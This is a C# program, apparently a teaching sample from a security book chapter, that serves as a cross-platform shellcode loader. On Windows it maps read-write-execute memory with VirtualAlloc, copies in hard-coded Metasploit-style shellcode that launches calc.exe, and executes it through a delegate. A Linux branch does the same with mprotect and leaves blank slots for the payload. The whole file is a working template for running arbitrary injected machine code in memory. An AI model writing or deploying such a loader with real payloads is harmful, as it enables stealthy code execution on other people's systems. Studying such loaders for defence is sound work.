
using System;
using System.Runtime.InteropServices;

namespace CH04_MSPayload
{
    class Program
    {

        /*
         * Windows Definitions
         */

        // Tell the virtual machine to look in kernel32.dll at runtime.
        [DllImport("kernel32")]

        // IntPtr is a class for passing data between managed and unmanaged code.
        static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);

        // Run the delegate as an unmanaged function and call VirtualAlloc()
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate void WindowsRun();


        /*
         * Linux Definitions
         */
        [DllImport("libc")]
        static extern IntPtr mprotect(IntPtr ptr, IntPtr length, IntPtr protection);

        [DllImport("libc")]
        static extern IntPtr posix_memalign(ref IntPtr ptr, IntPtr alignment, IntPtr size);

        [DllImport("libc")]
        static extern void free(IntPtr ptr);

        // In windows StdCall is used as the calling convention.
        // In linux cdecl is the calling convention of native functions in UNIX.
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        delegate void LinuxRun();


        static void Main()
        {
            // Get version of OS
            OperatingSystem os = Environment.OSVersion;

            // Used to determine the target architecture
            // 32 Bit Pointer = 4 bytes
            // 64 Bit Pointer = 8 bytes
            bool x86 = (IntPtr.Size == 4);

            // Container for payload code
            byte[] payload;

            if (os.Platform == PlatformID.Win32NT || os.Platform == PlatformID.Win32Windows)
            {
                if (!x86)
                    payload = new byte[276] {
                        0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
                        0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
                        0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
                        0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
                        0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
                        0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
                        0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
                        0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
                        0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
                        0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
                        0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
                        0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
                        0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
                        0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
                        0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
                        0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
                        0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
                        0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
                        0x63,0x2e,0x65,0x78,0x65,0x00 };
                else
                    payload = new byte[193] {
                        0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
                        0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
                        0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
                        0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
                        0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
                        0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
                        0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
                        0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
                        0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
                        0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
                        0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
                        0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
                        0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };

                // Allocate memory required to execute assembly
                //     Allocate memory at the first viable location
                //     Amount of memory to allocate
                //     Magic value in k32.dll that maps to MEM_COMMIT; allocate memory immediately
                //     Magic value in k32.dll that maps to read, write and execute  
                IntPtr ptr = VirtualAlloc(IntPtr.Zero, (IntPtr)payload.Length, (IntPtr)0x1000, (IntPtr)0x40);

                // Copy payload directly into the allocated memory space
                // Byte array to copy, beginning index of byte array, where to begin copying, how many bytes to copy(all)
                Marshal.Copy(payload, 0, ptr, payload.Length);

                // Reference the assembly as an unmanaged function pointer.
                // Create a new delegate based on the pointer to the beginning of the 
                // assembly code and define the type of delegate
                WindowsRun r = (WindowsRun)Marshal.GetDelegateForFunctionPointer(ptr, typeof(WindowsRun));
                r();
            }
            // If linux. This tests magic integer values rather than the defined
            // enumeration values in Windows.
            else if ((int)os.Platform == 4 || (int)os.Platform == 6 || (int)os.Platform == 128)
            {
                // Insert 32 and 64 bit linux payload here
                if (!x86)
                    payload = new byte[] { /* linux payload */ };
                else
                    payload = new byte[] { /* linux payload */};

                // ptr is assigned the pointer at the beginning of our allocated memory
                // in posix_memalign.
                IntPtr ptr = IntPtr.Zero;

                // Holds the value returned by posix_memalign
                IntPtr success = IntPtr.Zero;

                // Will be true when the memory allocations succeeds so that we know
                // when to free the allocated memory.
                bool freeMe = false;

                // Attempt memory allocation
                try
                {
                    // Default memory page size on linux
                    int pagesize = 4096;
                    IntPtr length = (IntPtr)payload.Length;

                    success = posix_memalign(ref ptr, (IntPtr)32, length);

                    // posix_memalign return IntPtr.Zero if allocation is successful
                    if (success != IntPtr.Zero)
                    {
                        Console.WriteLine("Memory alignment failed: " + success);
                        return;
                    }

                    freeMe = true;

                    // set up memory for marshaling
                    IntPtr alignedPtr = (IntPtr)((int)ptr & ~(pagesize - 1));
                    IntPtr mode = (IntPtr)(0x04 | 0x02 | 0x01);
                    success = mprotect(alignedPtr, (IntPtr)32, mode);

                    if (success != IntPtr.Zero)
                    {
                        int err = Marshal.GetLastWin32Error();
                        Console.WriteLine("Mprotect failed: " + err);
                        return;
                    }

                    // copy payload into memory
                    Marshal.Copy(payload, 0, ptr, payload.Length);

                    // Turn the payload in memory into a delegate that we can call from our managed code
                    LinuxRun r = (LinuxRun)Marshal.GetDelegateForFunctionPointer(ptr, typeof(LinuxRun));
                    r();
                }
                finally
                {
                    // free memory allocated by posix_memalign
                    if (freeMe)
                        free(ptr);
                }
            }
        }
    }
}


